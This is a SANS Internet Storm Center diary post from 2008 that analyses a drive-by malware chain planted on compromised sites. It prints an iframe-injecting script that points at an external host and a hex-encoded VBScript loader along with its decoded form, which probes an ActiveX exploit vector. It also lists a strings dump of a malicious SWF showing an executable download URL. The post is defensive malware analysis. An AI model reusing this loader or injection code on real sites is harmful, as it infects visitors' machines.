Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: InfoSec Handlers Diary Blog - Another example of malicious SWF InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Another example of malicious SWF

Published: 2008-05-28
Last Updated: 2008-05-28 17:16:57 UTC
by Adrien de Beaupre (Version: 1)
0 comment(s)

Jerry wrote in to tell us of a new variant on the theme of SWF files
being found in the wild. This ones uses encoded VBScript to deliver.
A google search for www.chliyi.com gives us over 5,000 hits! The likely
method of getting the malcious scripts on these web servers is SQL
injection, check your code regularly.

So, let's take a look at this one:

hxxp://www.chliyi.com/reg.js

Which contains:

if (navigator.systemLanguage=='zh-cn')
{
}
else{
document.writeln("<iframe src=hxxp://www.chliyi.com/img/info.htm
width=0 height=0></iframe>");

Downloading hxxp://www.chliyi.com/img/info.htm gives us the following:

<Script Language="VBScript">
Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204
572726F7220526573756D65204E6578740D0A09536574204F62203D20446F63756
D656E742E437265617465456C656D656E7428226F626A65637422290D0A094F622
E5365744174747269627574652022636C6173736964222C2022636C7369643A424
43936433535362D363541332D313144302D393833412D303043303446433239453
336220D0A0953657420506F70203D204F622E4372656174656F626A65637428224
1646F64622E53747265616D222C2222290D0A094966204E6F74204572722E4E756
D626572203D2030207468656E0D0A09094572722E636C6561720D0A0909446F637
56D656E742E77726974652028223C656D626564207372633D5C22666C6173682E7
377665C223E3C2F656D6265643E22290D0A0909446F63756D656E742E777269746
52028223C694672616D65207352633D7265616C2E68746D2077696474683D30206
865696768743D303E3C2F696672416D453E22290D0A0909446F63756D656E742E7
7726974652028223C694672616D65207352633D6E65772E68746D2077696474683
D30206865696768743D303E3C2F696672416D453E22290D0A09456C73650D0A090
9446F63756D656E742E77726974652028223C694672616D65207352633D68656C7
02E68746D2077696474683D30206865696768743D303E3C2F696672416D453E222
90D0A09456E642049660D0A3C2F5363726970743E"
Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans)
Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr &
Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" &
Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function
Document.Write Hex2Str(Song)
</Script>
<script language="javascript"
src="hxxp://count47.51yes.com/click.aspx?id=470732873&logo=12"></script>

This decodes using hex to string:

<Script Language=VBScript>
        On Error Resume Next
        Set Ob = Document.CreateElement("object")
        Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
        Set Pop = Ob.Createobject("Adodb.Stream","")
        If Not Err.Number = 0 then
                Err.clear
                Document.write ("<embed src=\"flash.swf\"></embed>")
                Document.write ("<iFrame sRc=real.htm width=0 height=0></ifrAmE>
")
                Document.write ("<iFrame sRc=new.htm width=0 height=0></ifrAmE>"
)
        Else
                Document.write ("<iFrame sRc=help.htm width=0 height=0></ifrAmE>
")
        End If
</Script>

Lets get  hxxp://www.chliyi.com/img/flash.swf
Which gives us:

file flash.swf
flash.swf: Macromedia Flash data, version 9

swfdump flash.swf
[HEADER]        File version: 9
[HEADER]        File size: 858
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 771
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[006]       336 DEFINEBITS defines id 0682
==== Error: Unknown tag:0x056 ====
[056]        40 (null)
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
==== Error: Unknown tag:0x056 ====
[056]        12 (null)
==== Error: Unknown tag:0x052 ====
[052]       383 (null)
==== Error: Unknown tag:0x04c ====
[04c]        25 (null)
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Which looks familiar to us now.
real.htm, new.htm, help.htm are also quite interesting.

strings flash.swf shows us another possible malware location:
FWS     Z
urlmon.dll
;C:\6123t.exe
hxxp://www.jj120.com/inc/f_ckjp.exe
                                  CC
new_fla
MainTimeline
flash.display   MovieClip
new_fla:MainTimeline
frame1
addFrameScript
Object
flash.events
EventDispatcher
DisplayObject
InteractiveObject
DisplayObjectContainer
Sprite
new_fla.MainTimeline

I munged the name of the file to pass language filters.
When I checked jj120.com resolved to 219.153.18.216 and didn't
want to give me the file.

Thanks again Bojan and Jeremy!

Cheers,
Adrien de Beaupré
Bell Canada, Professional Services

Keywords: malware swf
0 comment(s)
Diary Archives